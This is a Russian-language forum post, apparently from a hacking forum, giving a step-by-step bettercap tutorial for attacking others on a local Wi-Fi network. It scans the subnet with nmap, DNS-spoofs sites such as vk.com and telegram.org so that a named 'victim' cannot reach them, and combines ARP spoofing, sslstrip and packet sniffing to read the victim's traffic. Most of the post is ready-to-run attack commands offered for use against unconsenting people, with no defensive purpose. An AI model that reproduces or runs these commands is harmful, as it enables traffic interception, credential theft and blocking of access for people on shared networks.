Перехват данных и блокировка доступа к сайтам по локальной сети

Marat_1162

Стаж на ФС с 2014 г
ЖУРНАЛИСТ
Private Club
Старожил
Migalki Club
Меценат
Регистрация
25/3/16
Сообщения
4.625
Репутация
8.866
Реакции
22.633
RUB
0
Сделок через гаранта
4
Депозит
3 500 рублей
Приветствую! Сегодня мы будем перехватывать трафик и блокироваь доступ к сайтам через локальную сеть.

Установка:

1. Это не работает в Термукс. Для работы мы будем использовать линукс. Запускаем и вводим следующие команды:


• apt-get update


• apt-get upgrade


• apt -y install golang


• apt -y install bettercap


2. Для начала нам надо узнать какие устройства подключены к Wi-FI:


• nmap 192.168.1.1/24(192.168.1.1 это айпи роуетра)/24(это маска сети)

Запускаем Bettercap, с его помощью мы будем перехватывать данные и управлять сетью:


• sudo bettercap

Блокируем сайты.

Пишем через запятую сайты, которые хотим заблокировать:

• set dns.spoof.domains m.vk.com, telegram.org, my.telegram.org
Указываем локальный IP жертвы который мы получили из сканирования NMAP:


• set dns.spoof.address 192.168.1.5


dns.spoof on - START

После того, как мы запустили dns-spoof, жертва не сможет зайти на указанный вами сайт.

3. Далее просматриваем трафик жертвы:


- set http.proxy.sslstrip true
- events.clear
- set net.sniff.verbose false
- set net.sniff.local true
- set arp.spoof.targets IP жертвы
- arp.spoof on
- http.proxy on
- net.sniff on

После этого у вас будут отображаться все пакеты жертвы.
 
Сверху Снизу